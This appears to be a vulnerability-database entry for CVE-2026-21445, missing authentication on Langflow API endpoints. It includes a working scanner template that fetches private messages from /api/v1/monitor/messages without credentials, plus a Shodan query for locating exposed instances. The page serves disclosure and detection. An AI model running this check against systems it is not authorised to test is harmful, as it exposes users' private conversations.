CVE-2026-21445: Langflow - Broken Access Control

2026-04-09 Langflow PoC Public

Description

Langflow is a tool for building and deploying AI-powered agents and workflows. Prior to version 1.7.0.dev45, multiple critical API endpoints in Langflow are missing authentication controls. The issue allows any unauthenticated user to access sensitive user conversation data, transaction histories, and perform destructive operations including message deletion. This affects endpoints handling personal data and system operations that should require proper authorization.

PoC

id: CVE-2026-21445

info:
  name: Langflow - Broken Access Control
  author: DhiyaneshDk
  severity: critical
  description: |
    Langflow is a tool for building and deploying AI-powered agents and workflows. Prior to version 1.7.0.dev45, multiple critical API endpoints in Langflow are missing authentication controls. The issue allows any unauthenticated user to access sensitive user conversation data, transaction histories, and perform destructive operations including message deletion. This affects endpoints handling personal data and system operations that should require proper authorization.
  remediation: Update to version 1.7.0.dev45 or later.
  impact: |
    Unauthenticated attackers can access sensitive user data and perform destructive actions, risking data loss and privacy breaches.
  reference:
    - https://github.com/langflow-ai/langflow/security/advisories/GHSA-c5cp-vx83-jhqx
    - https://nvd.nist.gov/vuln/detail/CVE-2026-21445
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
    cvss-score: 9.1
    cve-id: CVE-2026-21445
    cwe-id: CWE-306
    epss-score: 0.3371
    epss-percentile: 0.98302
  metadata:
    verified: true
    max-request: 1
    vendor: langflow-ai
    product: langflow
    shodan-query: html:"Langflow"
  tags: cve,cve2026,langflow,auth-bypass,unauth,vkev

http:
  - method: GET
    path:
      - "{{BaseURL}}/api/v1/monitor/messages"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"text":'
          - '"timestamp":'
        condition: and

      - type: word
        part: content_type
        words:
          - "application/json"

      - type: status
        status:
          - 200
# digest: 490a0046304402203813f5c8e986c8760e36e4abab67fa921118ffb84c0b983b761ba9de152ceb780220039f7b5d79871f05af616fd86d81e445e533522c3370a836320604fcb072173e:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities